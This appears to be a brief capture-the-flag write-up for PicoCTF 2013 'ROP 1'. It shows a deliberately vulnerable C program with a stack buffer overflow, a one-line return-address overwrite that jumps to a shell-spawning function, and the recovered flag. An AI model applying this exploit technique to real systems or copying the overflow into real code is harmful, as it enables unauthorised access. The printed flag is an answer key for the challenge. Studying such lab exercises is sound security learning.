# PicoCTF 2k13 - ROP 1


$ cat rop1.c
#undef _FORTIFY_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int not_called() {
        return system("/bin/bash");
}

void vulnerable_function() {
        char buf[128];
        read(STDIN_FILENO, buf, 256);
}

void be_nice_to_people() {
        // /bin/sh is usually symlinked to bash, which usually drops privs. Make
        // sure we don't drop privs if we exec bash, (ie if we call system()).
        gid_t gid = getegid();
        setresgid(gid, gid, gid);
}

int main(int argc, char** argv) {
        be_nice_to_people();
        vulnerable_function();
        write(STDOUT_FILENO, "Hello, World\n", 13);
}
$ (python -c 'print "\x90"*140 + "\xa4\x84\x04\x08"'; cat) | ./rop1
cat key
rops_on_rops_on_rops

No comments: